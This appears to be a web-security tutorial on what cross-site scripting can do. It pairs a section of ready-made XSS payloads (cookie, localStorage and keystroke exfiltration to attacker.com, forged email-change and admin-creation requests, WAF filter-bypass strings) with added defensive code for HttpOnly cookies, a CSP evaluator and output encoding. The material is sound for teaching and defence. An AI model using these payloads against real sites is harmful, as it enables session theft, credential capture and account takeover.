Beyond alert(1): What XSS Can Actually Do
- Steal session cookies: full account takeover without ever learning the password
- Capture keystrokes: passwords are stolen as the victim types them, in real time
- Perform actions as the victim: the forged request is issued from the page's own origin, so SameSite cookie protection does not apply (CSRF via XSS)
- Exfiltrate JWT tokens kept in localStorage/sessionStorage
- Port-scan the internal network from the victim's browser
- Redirect to a phishing page with an identical UI
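Each impact in that list depends on the injected script being able to read the session cookie, read the token store, or reach an attacker-controlled origin. The following is an added defensive example (not code from the original page) showing the server-side controls that remove those capabilities: an HttpOnly session cookie, a nonce-based Content Security Policy that confines `fetch()` and `<img>` loads to the site's own origin, and a small CSP evaluator to check which exfiltration channels a given policy closes. The header names and cookie attributes are real; the cookie name, the nonce, the origins and the evaluator itself are constructed for this demo, and the evaluator only understands `'self'`, `'none'`, `*` and exact-origin host sources.

```javascript
// Added defensive example, not code from the original page. The header names
// and cookie attributes are real; cookie name, nonce, origins and the tiny
// CSP evaluator are constructed for this demo.

// Session cookie flags. HttpOnly removes the cookie from document.cookie, so a
// script that exfiltrates document.cookie gets nothing useful; Secure and
// SameSite limit where the browser will send it.
function buildSessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Content Security Policy. Inline scripts need the per-response nonce, and
// connect-src / img-src restrict where fetch() and <img> may reach, which is
// the channel the cookie, localStorage and keylogger payloads rely on.
function buildCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "connect-src 'self'",
    "img-src 'self'",
    "object-src 'none'",
    "base-uri 'none'",
  ].join('; ');
}

// Minimal CSP evaluator (assumption: only 'self', 'none', '*' and exact
// origin host-sources are understood; scheme-sources and host wildcards are
// not). Answers: would this policy let <directive> load <targetOrigin>?
function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name) policy[name] = sources;
  }
  return policy;
}

function cspAllows(header, directive, targetOrigin, pageOrigin) {
  const policy = parseCsp(header);
  // A missing directive falls back to default-src; if that is missing too,
  // CSP imposes no restriction on that load type.
  const sources = policy[directive] || policy['default-src'] || ['*'];
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === '*') return true;
    if (src === "'self'") return targetOrigin === pageOrigin;
    return src === targetOrigin; // exact host-source match
  });
}

// Demo against the exfiltration destination used in the payloads on this page
const page = 'https://app.example';            // constructed page origin
const csp = buildCsp('r4nd0mN0nce');            // nonce must be fresh per response
console.log(buildSessionCookie('sid', 'opaque-session-id'));
console.log(csp);
console.log('fetch() to attacker.com allowed?',
  cspAllows(csp, 'connect-src', 'https://attacker.com', page)); // false
console.log('Image() to attacker.com allowed?',
  cspAllows(csp, 'img-src', 'https://attacker.com', page));     // false
```

The evaluator makes one point concrete: a policy that only sets `script-src` leaves `connect-src` and `img-src` unrestricted, so the exfiltration still succeeds even though inline script injection is harder. Setting `default-src 'self'` closes that gap for every fetch type you did not list explicitly.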
High-Impact XSS Payloads
# ── SESSION THEFT ─────────────────────────────────────────────────
<script>
new Image().src = 'https://attacker.com/steal?c=' + btoa(document.cookie);
</script>
# ── LOCALSTORAGE THEFT (JWT tokens often stored here) ─────────────
<script>
fetch('https://attacker.com/steal?ls=' + btoa(JSON.stringify(localStorage)));
</script>
# ── KEYLOGGER ─────────────────────────────────────────────────────
<script>
document.addEventListener('keypress', function(e) {
fetch('https://attacker.com/keys?k=' + e.key + '&url=' + location.href);
});
</script>
# ── ACCOUNT TAKEOVER via CSRF+XSS (changes victim's email) ────────
<script>
fetch('/api/account/update', {
method: 'POST', credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ email: '[email protected]' })
});
</script>
# ── CREATE ADMIN USER via STORED XSS (when admin views infected page) ──
<script>
fetch('/admin/users/create', {
method: 'POST', credentials: 'include',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({username:'hacker',password:'P@ss123',role:'admin'})
});
</script>
WAF Bypass Techniques
| Bypass Payload | Filter Bypassed | Why It Works |
|---|---|---|
| `<ScRiPt>alert(1)</sCrIpT>` | Case-sensitive filter | HTML tag names are case-insensitive: the browser normalizes them, a case-sensitive WAF rule does not match |
| `<img src=x>` | Keyword "alert" blocked | HTML entity encoding is decoded by the browser before the handler executes |
| `eval(atob('YWxlcnQoMSk='))` | alert() blocked | Base64 is decoded at runtime, so the WAF sees only an opaque base64 string |
| `<details open>` | script tag blocked | HTML5 event handler on a non-script element; most WAFs do not inspect these |
| `<svg/onload=alert(1)>` | Space-based filter | A slash separates the tag name from the attribute, so no space is required |
| `<img src=1>` | Parentheses blocked | Template-literal call syntax, so no `()` is needed |
| `<script>window['ale'+'rt'](1)</script>` | "alert" keyword blocked | The function name is built by string concatenation and resolved at runtime |
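Every row in the table defeats the same defence: a signature filter matching the raw request string. The added example below (not code from the original page) shows why that layer keeps losing and what the durable fix is. It contrasts a constructed naive case-sensitive blocklist with a normalising one that lower-cases and entity-decodes input the way the browser would, then applies contextual HTML output encoding at render time. The sample strings are the payloads already listed in the table; the filter functions, `renderComment`, and the tag-counting check are constructed for this demo.

```javascript
// Added defensive example, not code from the original page. Sample strings are
// the table's own payloads; filters and render helpers are constructed here.

// A naive signature filter: literal, case-sensitive match on "<script>".
// This is the rule the mixed-case and non-script-tag rows walk past.
function naiveBlocklist(input) {
  return input.includes('<script>');
}

// A better filter normalises the way the browser will: decode HTML entities,
// lower-case, then look for script tags, alert calls and on*= handlers. It
// catches the case and entity rows, but still misses payloads that only take
// shape at runtime (base64 decode, string concatenation).
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&lt;/gi, '<').replace(/&gt;/gi, '>')
    .replace(/&quot;/gi, '"').replace(/&amp;/gi, '&');
}
function normalisedBlocklist(input) {
  const n = decodeEntities(input).toLowerCase();
  return n.includes('<script') || n.includes('alert(') || /\bon[a-z]+\s*=/.test(n);
}

// Contextual output encoding: the durable fix. Every character that can change
// HTML structure is escaped at the point of output, so no row becomes markup
// regardless of case, encoding, or how the payload is assembled at runtime.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return s.replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Vulnerable and hardened renderers for a user-supplied comment.
function renderCommentUnsafe(userText) {
  return `<p class="comment">${userText}</p>`;
}
function renderComment(userText) {
  return `<p class="comment">${escapeHtml(userText)}</p>`;
}

// Number of opening tags the HTML parser will see. The template contributes
// exactly one (<p>), so anything above 1 means user text became markup.
function countOpenTags(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}

const SAMPLES = [
  '<ScRiPt>alert(1)</sCrIpT>',
  '<svg/onload=alert(1)>',
  "<script>window['ale'+'rt'](1)</script>",
  "eval(atob('YWxlcnQoMSk='))",
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s));
  console.log('  naive filter blocks:     ', naiveBlocklist(s));
  console.log('  normalised filter blocks:', normalisedBlocklist(s));
  console.log('  tags after unsafe render:', countOpenTags(renderCommentUnsafe(s)));
  console.log('  tags after safe render:  ', countOpenTags(renderComment(s)));
}
```

Reading the output top to bottom gives the practical conclusion: improving the filter closes individual rows, but the base64 sample slips past even the normalised filter because it contains no recognisable signature at all, while the encoded renderer leaves every sample as inert text. A WAF is a useful detection layer, but the control that actually ends the bypass race is encoding at output, with a CSP as the backstop.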